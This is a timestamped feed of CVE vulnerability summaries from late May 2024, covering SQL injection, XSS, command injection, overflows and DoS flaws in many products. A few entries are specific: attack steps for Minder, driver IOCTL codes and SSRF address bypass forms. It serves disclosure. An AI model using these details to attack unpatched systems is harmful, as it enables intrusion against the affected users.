🚨 CVE-2023-35952Multiple stack-based buffer overflow vulnerabilities exist in the readOFF.cpp functionality of libigl v2.4.0. A specially-crafted .off file can lead to a buffer overflow. An attacker can arbitrary code execution to trigger these vulnerabilities.This vulnerability exists within the code responsible for parsing comments within the geometric faces section within an OFF file.🎖@cveNotify |
|
| 2024-05-28 15:08:07 |
🚨 CVE-2023-35950Multiple stack-based buffer overflow vulnerabilities exist in the readOFF.cpp functionality of libigl v2.4.0. A specially-crafted .off file can lead to a buffer overflow. An attacker can arbitrary code execution to trigger these vulnerabilities.This vulnerability exists within the code responsible for parsing the header of an OFF file.🎖@cveNotify |
|
| 2024-05-28 15:08:03 |
🚨 CVE-2024-5415A vulnerability have been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/backup.php, 'comments' and 'db' parameters. This vulnerabilities could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their session details.🎖@cveNotify |
|
| 2024-05-28 15:08:02 |
🚨 CVE-2024-5413A vulnerability have been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/scheduled.php, all parameters. This vulnerabilities could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their session details.🎖@cveNotify |
|
| 2024-05-28 15:08:01 |
🚨 CVE-2024-3657A flaw was found in 389-ds-base. A specially-crafted LDAP query can potentially cause a failure on the directory server, leading to a denial of service🎖@cveNotify |
|
| 2024-05-28 13:38:40 |
🚨 CVE-2024-5413A vulnerability have been discovered in PhpMyBackupPro affecting version 2.3 that could allow an attacker to execute XSS through /phpmybackuppro/scheduled.php, all parameters. This vulnerabilities could allow an attacker to create a specially crafted URL and send it to a victim to retrieve their session details.🎖@cveNotify |
|
| 2024-05-28 13:38:39 |
🚨 CVE-2023-5937On Windows systems, the Arc configuration files resulted to be world-readable.This can lead to information disclosure by local attackers, via exfiltration of sensitive data from configuration files.🎖@cveNotify |
|
| 2024-05-28 13:38:38 |
🚨 CVE-2023-5936On Unix systems (Linux, MacOS), Arc uses a temporary file with unsafe privileges.By tampering with such file, a malicious local user in the system may be able to trigger arbitrary code execution with root privileges.🎖@cveNotify |
|
| 2024-05-28 13:38:35 |
🚨 CVE-2023-5935When configuring Arc (e.g. during the first setup), a local web interface is provided to ease the configuration process. Such web interface lacks authentication and may thus be abused by a local attacker or malware running on the machine itself.A malicious local user or process, during a window of opportunity when the local web interface is active, may be able to extract sensitive information or change Arc's configuration. This could also lead to arbitrary code execution if a malicious update package is installed.🎖@cveNotify |
|
| 2024-05-28 13:38:34 |
🚨 CVE-2024-0218A Denial of Service (Dos) vulnerability in Nozomi Networks Guardian, caused by improper input validation in certain fields used in the Radius parsing functionality of our IDS, allows an unauthenticated attacker sending specially crafted malformed network packets to cause the IDS module to stop updating nodes, links, and assets.Network traffic may not be analyzed until the IDS module is restarted.🎖@cveNotify |
|
| 2024-05-28 13:38:33 |
🚨 CVE-2023-32649A Denial of Service (Dos) vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain fields used in the Asset Intelligence functionality of our IDS, allows an unauthenticated attacker to crash the IDS module by sending specially crafted malformed network packets.During the (limited) time window before the IDS module is automatically restarted, network traffic may not be analyzed.🎖@cveNotify |
|
| 2024-05-28 13:38:29 |
🚨 CVE-2023-2567A SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain parameters used in the Query functionality, allows an authenticated attacker to execute arbitrary SQL queries on the DBMS used by the web application.Authenticated users can extract arbitrary information from the DBMS in an uncontrolled way.🎖@cveNotify |
|
| 2024-05-28 13:38:28 |
🚨 CVE-2023-24015A partial DoS vulnerability has been detected in the Reports section, exploitable by a malicious authenticated user forcing a report to be saved with its name set as null.The reports section will be partially unavailable for all later attempts to use it, with the report list seemingly stuck on loading.🎖@cveNotify |
|
| 2024-05-28 13:38:27 |
🚨 CVE-2023-24471An access control vulnerability was found, due to the restrictions that are applied on actual assertions not being enforced in their debug functionality.An authenticated user with reduced visibility can obtain unauthorized information via the debug functionality, obtaining data that would normally be not accessible in the Query and Assertions functions.🎖@cveNotify |
|
| 2024-05-28 13:38:23 |
🚨 CVE-2023-23574A blind SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in the alerts_count component, allows an authenticated attacker to execute arbitrary SQL queries on the DBMS used by the web application.Authenticated users can extract arbitrary information from the DBMS in an uncontrolled way.🎖@cveNotify |
|
| 2024-05-28 13:38:22 |
🚨 CVE-2023-22843An authenticated attacker with administrative access to the appliance can inject malicious JavaScript code inside the definition of a Threat Intelligence rule, that will later be executed by another legitimate user viewing the details of such a rule.An attacker may be able to perform unauthorized actions on behalf of legitimate users. JavaScript injection was possible in the content for Yara rules, while limited HTML injection has been proven for packet and STYX rules.The injected code will be executed in the context of the authenticated victim's session.🎖@cveNotify |
|
| 2024-05-28 13:38:21 |
🚨 CVE-2023-24477In certain conditions, depending on timing and the usage of the Chrome web browser, Guardian/CMC versions before 22.6.2 do not always completely invalidate the user session upon logout. Thus an authenticated local attacker may gain acces to the original user's session.🎖@cveNotify |
|
| 2024-05-28 13:38:20 |
🚨 CVE-2022-4259Due to improper input validation in the Alerts controller, a SQL injection vulnerability in Nozomi Networks Guardian and CMC allows an authenticated attacker to execute arbitrary SQL queries on the DBMS used by the web application.🎖@cveNotify |
|
| 2024-05-28 13:08:16 |
🚨 CVE-2024-5340A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/vpn/autovpn/sub_commit.php. The manipulation of the argument key leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-28 13:08:15 |
🚨 CVE-2024-5339A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/vpn/autovpn/online_check.php. The manipulation of the argument peernode leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-28 13:08:14 |
🚨 CVE-2024-5338A vulnerability was found in Ruijie RG-UAC up to 20240516. It has been classified as critical. Affected is an unknown function of the file /view/vpn/autovpn/online.php. The manipulation of the argument peernode leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-28 13:08:11 |
🚨 CVE-2024-5337A vulnerability was found in Ruijie RG-UAC up to 20240516 and classified as critical. This issue affects some unknown processing of the file /view/systemConfig/sys_user/user_commit.php. The manipulation of the argument email2/user_name leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266243. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-28 13:08:10 |
🚨 CVE-2024-4045The Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘campaign_id’ parameter in versions up to, and including, 2.16.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-28 13:08:09 |
🚨 CVE-2024-5229The Primary Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-28 13:08:05 |
🚨 CVE-2024-5220The ND Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's upload feature in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-28 13:08:04 |
🚨 CVE-2024-35374Mocodo Mocodo Online 4.2.6 and below does not properly sanitize the sql_case input field in /web/generate.php, allowing remote attackers to execute arbitrary SQL commands and potentially command injection, leading to remote code execution (RCE) under certain conditions.🎖@cveNotify |
|
| 2024-05-28 13:08:03 |
🚨 CVE-2024-35373Mocodo Mocodo Online 4.2.6 and below is vulnerable to Remote Code Execution via /web/rewrite.php.🎖@cveNotify |
|
| 2024-05-28 13:08:00 |
🚨 CVE-2024-35232github.com/huandu/facebook is a Go package that fully supports the Facebook Graph API with file upload, batch request and marketing API. access_token can be exposed in error message on fail in HTTP request. This issue has been patched in version 2.7.2.🎖@cveNotify |
|
| 2024-05-28 13:07:59 |
🚨 CVE-2024-33471An issue in the Sensor Settings of AVTECH Room Alert 4E v4.4.0 allows attackers to gain access to SMTP credentials in plaintext via a crafted AJAX request. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-05-28 13:07:58 |
🚨 CVE-2023-52656In the Linux kernel, the following vulnerability has been resolved:io_uring: drop any code related to SCM_RIGHTSThis is dead code after we dropped support for passing io_uring fdsover SCM_RIGHTS, get rid of it.🎖@cveNotify |
|
| 2024-05-28 11:37:46 |
🚨 CVE-2024-5411Missing input validation and OS command integration of the input in the ORing IAP-420 web-interface allows authenticated command injection.This issue affects IAP-420 version 2.01e and below.🎖@cveNotify |
|
| 2024-05-28 11:37:45 |
🚨 CVE-2024-5410Missing input validation in the ORing IAP-420 web-interface allows stored Cross-Site Scripting (XSS).This issue affects IAP-420 version 2.01e and below.🎖@cveNotify |
|
| 2024-05-28 11:37:41 |
🚨 CVE-2022-2513A vulnerability exists in the Intelligent Electronic Device (IED) Connectivity Package (ConnPack) credential storage function in Hitachi Energy’s PCM600 product included in the versions listed below, where IEDs credentials are stored in a cleartext format in the PCM600 database and logs files. An attacker having get access to the exported backup file can exploit the vulnerability and obtain user credentials of the IEDs. Additionally, an attacker with administrator access to the PCM600 host machine can obtain other user credentials by analyzing database log files. The credentials may be used to perform unauthorized modifications such as loading incorrect configurations, reboot the IEDs or cause a denial-of-service on the IEDs.🎖@cveNotify |
|
| 2024-05-28 11:37:40 |
🚨 CVE-2022-0550Improper Input Validation vulnerability in custom report logo upload in Nozomi Networks Guardian, and CMC allows an authenticated attacker with admin or report manager roles to execute unattended commands on the appliance using web server user privileges. This issue affects: Nozomi Networks Guardian versions prior to 22.0.0. Nozomi Networks CMC versions prior to 22.0.0.🎖@cveNotify |
|
| 2024-05-28 11:37:39 |
🚨 CVE-2021-26724OS Command Injection vulnerability when changing date settings or hostname using web GUI of Nozomi Networks Guardian and CMC allows authenticated administrators to perform remote code execution. This issue affects: Nozomi Networks Guardian 20.0.7.3 version 20.0.7.3 and prior versions. Nozomi Networks CMC 20.0.7.3 version 20.0.7.3 and prior versions.🎖@cveNotify |
|
| 2024-05-28 07:37:30 |
🚨 CVE-2023-52712Various Issues Due To Exposed SMI Handler in AmdPspP2CmboxV2. The first issue can be leveraged to bypass the protections that have been put in place by previous UEFI phases to prevent direct access to the SPI flash. The second issue can be used to both leak and corrupt SMM memory, thus potentially leading code execution in SMM🎖@cveNotify |
|
| 2024-05-28 07:37:26 |
🚨 CVE-2023-52710Huawei Matebook D16(Model: CREM-WXX9, BIOS: v2.26), As the communication buffer size hasn’t been properly validated to be of the expected size, it can partially overlap with the beginning SMRAM.This can be leveraged by a malicious OS attacker to corrupt data structures stored at the beginning of SMRAM and can potentially lead to code execution in SMM.🎖@cveNotify |
|
| 2024-05-28 07:37:25 |
🚨 CVE-2023-52547Huawei Matebook D16(Model: CREM-WXX9, BIOS: v2.26. Memory Corruption in SMI Handler of HddPassword SMM Module. This can be leveraged by a malicious OS attacker to corrupt data structures stored at the beginning of SMRAM and can potentially lead to code execution in SMM.🎖@cveNotify |
|
| 2024-05-28 07:37:24 |
🚨 CVE-2022-48681Some Huawei smart speakers have a memory overflow vulnerability. Successful exploitation of this vulnerability may cause certain functions to fail.🎖@cveNotify |
|
| 2024-05-28 04:37:24 |
🚨 CVE-2022-48681Some Huawei smart speakers have a memory overflow vulnerability. Successful exploitation of this vulnerability may cause certain functions to fail.🎖@cveNotify |
|
| 2024-05-28 03:37:47 |
🚨 CVE-2024-32944Path traversal vulnerability exists in UTAU versions prior to v0.4.19. If a user of the product installs a crafted UTAU voicebank installer (.uar file, .zip file) to UTAU, an arbitrary file may be placed.🎖@cveNotify |
|
| 2024-05-28 03:37:46 |
🚨 CVE-2024-28886OS command injection vulnerability exists in UTAU versions prior to v0.4.19. If a user of the product opens a crafted UTAU project file (.ust file), an arbitrary OS command may be executed.🎖@cveNotify |
|
| 2024-05-28 00:37:39 |
🚨 CVE-2024-28880Path traversal vulnerability in MosP kintai kanri V4.6.6 and earlier allows a remote attacker who can log in to the product to obtain sensitive information of the product.🎖@cveNotify |
|
| 2024-05-27 23:37:24 |
🚨 CVE-2024-36428OrangeHRM 3.3.3 allows admin/viewProjects sortOrder SQL injection.🎖@cveNotify |
|
| 2024-05-27 22:37:24 |
🚨 CVE-2024-36426In TARGIT Decision Suite 23.2.15007.0 before Autumn 2023, the session token is part of the URL and may be sent in a cleartext HTTP session.🎖@cveNotify |
|
| 2024-05-27 20:37:24 |
🚨 CVE-2024-29415The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.🎖@cveNotify |
|
| 2024-05-27 19:37:25 |
🚨 CVE-2024-35182Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.22 may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command. Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system. The Meshery project exposes the function `GetAllEvents` at the API URL `/api/v2/events`. The sort query parameter read in `events_streamer.go` is directly used to build a SQL query in `events_persister.go`. Version 0.7.22 fixes this issue by using the `SanitizeOrderInput` function.🎖@cveNotify |
|
| 2024-05-27 19:37:24 |
🚨 CVE-2024-35181Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.22 may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command. Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system. The Meshery project exposes the function `GetMeshSyncResourcesKinds` at the API URL `/api/system/meshsync/resources/kinds`. The order query parameter is directly used to build a SQL query in `meshync_handler.go`. Version 0.7.22 fixes this issue.🎖@cveNotify |
|
| 2024-05-27 18:37:26 |
🚨 CVE-2024-36105dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. Prior to versions 1.6.15, 1.7.15, and 1.8.1, Binding to `INADDR_ANY (0.0.0.0)` or `IN6ADDR_ANY (::)` exposes an application on all network interfaces, increasing the risk of unauthorized access. As stated in the Python docs, a special form for address is accepted instead of a host address: `''` represents `INADDR_ANY`, equivalent to `"0.0.0.0"`. On systems with IPv6, '' represents `IN6ADDR_ANY`, which is equivalent to `"::"`. A user who serves docs on an unsecured public network, may unknowingly be hosting an unsecured (http) web site for any remote user/system to access on the same network. The issue has has been mitigated in dbt-core v1.6.15, dbt-core v1.7.15, and dbt-core v1.8.1 by binding to localhost explicitly by default in `dbt docs serve`.🎖@cveNotify |
|
| 2024-05-27 18:37:25 |
🚨 CVE-2024-35238Minder by Stacklok is an open source software supply chain security platform. Minder prior to version 0.0.51 is vulnerable to a denial-of-service (DoS) attack which could allow an attacker to crash the Minder server and deny other users access to it. The root cause of the vulnerability is that Minders sigstore verifier reads an untrusted response entirely into memory without enforcing a limit on the response body. An attacker can exploit this by making Minder make a request to an attacker-controlled endpoint which returns a response with a large body which will crash the Minder server. Specifically, the point of failure is where Minder parses the response from the GitHub attestations endpoint in `getAttestationReply`. Here, Minder makes a request to the `orgs/$owner/attestations/$checksumref` GitHub endpoint (line 285) and then parses the response into the `AttestationReply` (line 295). The way Minder parses the response on line 295 makes it prone to DoS if the response is large enough. Essentially, the response needs to be larger than the machine has available memory. Version 0.0.51 contains a patch for this issue.The content that is hosted at the `orgs/$owner/attestations/$checksumref` GitHub attestation endpoint is controlled by users including unauthenticated users to Minders threat model. However, a user will need to configure their own Minder settings to cause Minder to make Minder send a request to fetch the attestations. The user would need to know of a package whose attestations were configured in such a way that they would return a large response when fetching them. As such, the steps needed to carry out this attack would look as such:1. The attacker adds a package to ghcr.io with attestations that can be fetched via the `orgs/$owner/attestations/$checksumref` GitHub endpoint.2. The attacker registers on Minder and makes Minder fetch the attestations.3. Minder fetches attestations and crashes thereby being denied of service.🎖@cveNotify |
|
| 2024-05-27 18:37:24 |
🚨 CVE-2024-27310Zoho ManageEngine ADSelfService Plus versions below 6401 are vulnerable to the DOS attack due to the malicious LDAP query.🎖@cveNotify |
|
| 2024-05-27 17:37:27 |
🚨 CVE-2024-35236Audiobookshelf is a self-hosted audiobook and podcast server. Prior to version 2.10.0, opening an ebook with malicious scripts inside leads to code execution inside the browsing context. Attacking a user with high privileges (upload, creation of libraries) can lead to remote code execution (RCE) in the worst case. This was tested on version 2.9.0 on Windows, but an arbitrary file write is powerful enough as is and should easily lead to RCE on Linux, too. Version 2.10.0 contains a patch for the vulnerability.🎖@cveNotify |
|
| 2024-05-27 17:37:26 |
🚨 CVE-2024-35231rack-contrib provides contributed rack middleware and utilities for Rack, a Ruby web server interface. Versions of rack-contrib prior to 2.5.0 are vulnerable to denial of service due to the fact that the user controlled data `profiler_runs` was not constrained to any limitation. This would lead to allocating resources on the server side with no limitation and a potential denial of service by remotely user-controlled data. Version 2.5.0 contains a patch for the issue.🎖@cveNotify |
|
| 2024-05-27 17:37:25 |
🚨 CVE-2024-35229ZKsync Era is a layer 2 rollup that uses zero-knowledge proofs to scale Ethereum. Prior to version 1.3.10, there is a very specific pattern `f(a(),b()); check_if_a_executed_last()` in Yul that exposes a bug in evaluation order of Yul function arguments. This vulnerability has been fixed in version 1.3.10. As a workaround, update and redeploy affected contracts.🎖@cveNotify |
|
| 2024-05-27 17:37:24 |
🚨 CVE-2022-4969A vulnerability, which was classified as critical, has been found in bwoodsend rockhopper up to 0.1.2. Affected by this issue is the function count_rows of the file rockhopper/src/ragged_array.c of the component Binary Parser. The manipulation of the argument raw leads to buffer overflow. Local access is required to approach this attack. Upgrading to version 0.2.0 is able to address this issue. The name of the patch is 1a15fad5e06ae693eb9b8908363d2c8ef455104e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-266312.🎖@cveNotify |
|
| 2024-05-27 16:37:25 |
🚨 CVE-2024-35219OpenAPI Generator allows generation of API client libraries (SDK generation), server stubs, documentation and configuration automatically given an OpenAPI Spec. Prior to version 7.6.0, attackers can exploit a path traversal vulnerability to read and delete files and folders from an arbitrary, writable directory as anyone can set the output folder when submitting the request via the `outputFolder` option. The issue was fixed in version 7.6.0 by removing the usage of the `outputFolder` option. No known workarounds are available.🎖@cveNotify |
|
| 2024-05-27 16:37:24 |
🚨 CVE-2024-32978Kaminari is a paginator for web app frameworks and object relational mappings. A security vulnerability involving insecure file permissions has been identified in the Kaminari pagination library for Ruby on Rails, concerning insecure file permissions. This vulnerability is of moderate severity due to the potential for unauthorized write access to particular Ruby files managed by the library. Such access could lead to the alteration of application behavior or data integrity issues. Users of affected versions are advised to update to Kaminari version 1.2.2 or later, where file permissions have been adjusted to enhance security. If upgrading is not feasible immediately, review and adjust the file permissions for particular Ruby files in Kaminari to ensure they are only accessible by authorized user.🎖@cveNotify |
|
| 2024-05-27 14:37:58 |
🚨 CVE-2023-50977In GNOME Shell through 45.2, unauthenticated remote code execution can be achieved by intercepting two DNS requests (GNOME Network Manager and GNOME Shell Portal Helper connectivity checks), and responding with attacker-specific IP addresses. This DNS hijacking causes GNOME Captive Portal to be launched via a WebKitGTK browser, by default, on the victim system; this can run JavaScript code inside a sandbox. NOTE: the vendor's position is that this is not a vulnerability because running JavaScript code inside a sandbox is the intended behavior.🎖@cveNotify |
|
| 2024-05-27 14:37:57 |
🚨 CVE-2021-41320A technical user has hardcoded credentials in Wallstreet Suite TRM 7.4.83 (64-bit edition) with higher privilege than the average authenticated user. NOTE: the vendor disputes this because the password is not hardcoded (it can be changed during installation or at any later time).🎖@cveNotify |
|
| 2024-05-27 12:37:52 |
🚨 CVE-2024-5406A vulnerability had been discovered in WinNMP 19.02 consisting of an XSS attack via index page in from, subject, text and hash parameters. This vulnerability could allow a remote user to send a specially crafted query to an authenticated user and steal their session details.🎖@cveNotify |
|
| 2024-05-27 12:37:51 |
🚨 CVE-2023-6349A heap overflow vulnerability exists in libvpx - Encoding a frame that has larger dimensions than the originally configured size with VP9 may result in a heap overflow in libvpx.We recommend upgrading to version 1.13.1 or above🎖@cveNotify |
|
| 2024-05-27 11:37:47 |
🚨 CVE-2024-36383An issue was discovered in Logpoint SAML Authentication before 6.0.3. An attacker can place a crafted filename in the state field of a SAML SSO-URL response, and the file corresponding to this filename will ultimately be deleted. This can lead to a SAML Authentication login outage.🎖@cveNotify |
|
| 2024-05-27 07:37:34 |
🚨 CVE-2024-5403ASKEY 5G NR Small Cell fails to properly filter user input for certain functionality, allowing remote attackers with administrator privilege to execute arbitrary system commands on the remote server.🎖@cveNotify |
|
| 2024-05-27 07:37:33 |
🚨 CVE-2024-27314Zoho ManageEngine ServiceDesk Plus versions below 14730, ServiceDesk Plus MSP below 14720 and SupportCenter Plus below 14730 are vulnerable to stored XSS in the Custom Actions menu on the request details. This vulnerability can be exploited only by the SDAdmin role users.🎖@cveNotify |
|
| 2024-05-27 07:37:32 |
🚨 CVE-2024-26289Deserialization of Untrusted Data vulnerability in PMB Services PMB allows Remote Code Inclusion.This issue affects PMB: from 7.5.1 before 7.5.6-2, from 7.4.1 before 7.4.9, from 7.3.1 before 7.3.18.🎖@cveNotify |
|
| 2024-05-27 06:37:54 |
🚨 CVE-2024-4535The KKProgressbar2 Free WordPress plugin through 1.1.4.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks🎖@cveNotify |
|
| 2024-05-27 06:37:53 |
🚨 CVE-2024-4532The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as deleting cards via CSRF attacks🎖@cveNotify |
|
| 2024-05-27 06:37:49 |
🚨 CVE-2024-4531The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing cards via CSRF attacks🎖@cveNotify |
|
| 2024-05-27 06:37:48 |
🚨 CVE-2024-4530The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing card categories via CSRF attacks🎖@cveNotify |
|
| 2024-05-27 06:37:47 |
🚨 CVE-2024-3933In Eclipse OpenJ9 release versions prior to 0.44.0 and after 0.13.0, when running with JVM option -Xgc:concurrentScavenge, the sequence generated for System.arrayCopy on the IBM Z platform with hardware and software support for guarded storage [1], could allow access to a buffer with an incorrect length value when executing an arraycopy sequence while the Concurrent Scavenge Garbage Collection cycle is active and the source and destination memory regions for arraycopy overlap. This allows read and write to addresses beyond the end of the array range.🎖@cveNotify |
|
| 2024-05-27 05:37:53 |
🚨 CVE-2024-35297Cross-site scripting vulnerability exists in WP Booking versions prior to 2.4.5. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is accessing the web site using the product.🎖@cveNotify |
|
| 2024-05-27 05:37:52 |
🚨 CVE-2024-35291Cross-site scripting vulnerability exists in Splunk Config Explorer versions prior to 1.7.16. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is using the product.🎖@cveNotify |
|
| 2024-05-27 04:37:46 |
🚨 CVE-2024-5399Openfind Mail2000 does not properly filter parameters of specific API. Remote attackers with administrative privileges can exploit this vulnerability to execute arbitrary system commands on the remote server.🎖@cveNotify |
|
| 2024-05-27 04:37:45 |
🚨 CVE-2024-36384Pointsharp Cryptshare Server before 7.0.0 has an XSS issue that is related to notification messages.🎖@cveNotify |
|
| 2024-05-27 03:37:25 |
🚨 CVE-2024-5396A vulnerability classified as critical has been found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file newfaculty.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266310 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-27 03:37:24 |
🚨 CVE-2024-5395A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file listofinstructor.php. The manipulation of the argument FullName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266309 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-27 02:37:28 |
🚨 CVE-2024-5393A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been classified as critical. This affects an unknown part of the file listofcourse.php. The manipulation of the argument idno leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266307.🎖@cveNotify |
|
| 2024-05-27 02:37:27 |
🚨 CVE-2024-5392A vulnerability was found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file editSubject.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266306 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 23:37:30 |
🚨 CVE-2024-5381A vulnerability classified as critical was found in itsourcecode Student Information Management System 1.0. Affected by this vulnerability is an unknown functionality of the file view.php. The manipulation of the argument studentId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266293 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 23:37:26 |
🚨 CVE-2024-4286Mintplex-Labs' anything-llm application is vulnerable to improper neutralization of special elements used in an expression language statement, identified in the commit id `57984fa85c31988b2eff429adfc654c46e0c342a`. The vulnerability arises from the application's handling of user modifications by managers or admins, allowing for the modification of all existing attributes of the `user` database entity without proper checks or sanitization. This flaw can be exploited to delete user threads, denying users access to their previously submitted data, or to inject fake threads and/or chat history for social engineering attacks.🎖@cveNotify |
|
| 2024-05-26 23:37:25 |
🚨 CVE-2024-36055Hw64.sys in Marvin Test HW.exe before 5.0.5.0 allows unprivileged user-mode processes to arbitrarily map physical memory with read/write access via the MmMapIoSpace API (IOCTL 0x9c40a4f8, 0x9c40a4e8, 0x9c40a4c0, 0x9c40a4c4, 0x9c40a4ec, and seven others), leading to a denial of service (BSOD).🎖@cveNotify |
|
| 2024-05-26 23:37:24 |
🚨 CVE-2024-36054Hw64.sys in Marvin Test HW.exe before 5.0.5.0 allows unprivileged user-mode processes to arbitrarily read kernel memory (and consequently gain all privileges) via IOCTL 0x9c4064b8 (via MmMapIoSpace) and IOCTL 0x9c406490 (via ZwMapViewOfSection).🎖@cveNotify |
|
| 2024-05-26 21:37:25 |
🚨 CVE-2024-5377A vulnerability was found in SourceCodester Vehicle Management System 1.0. It has been classified as critical. This affects an unknown part of the file /newvehicle.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266289 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 21:37:24 |
🚨 CVE-2024-5376A vulnerability was found in Kashipara College Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file view_each_faculty.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266288.🎖@cveNotify |
|
| 2024-05-26 20:37:25 |
🚨 CVE-2024-5375A vulnerability has been found in Kashipara College Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file submit_student.php. The manipulation of the argument address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266287.🎖@cveNotify |
|
| 2024-05-26 20:37:24 |
🚨 CVE-2024-5374A vulnerability, which was classified as problematic, was found in Kashipara College Management System 1.0. Affected is an unknown function of the file submit_new_faculty.php. The manipulation of the argument address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266286 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 19:37:25 |
🚨 CVE-2024-5373A vulnerability, which was classified as problematic, has been found in Kashipara College Management System 1.0. This issue affects some unknown processing of the file submit_login.php. The manipulation of the argument usertype leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266285 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-26 19:37:24 |
🚨 CVE-2024-5372A vulnerability classified as problematic was found in Kashipara College Management System 1.0. This vulnerability affects unknown code of the file submit_extracurricular_activity.php. The manipulation of the argument activity_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266284.🎖@cveNotify |
|
| 2024-05-26 18:37:25 |
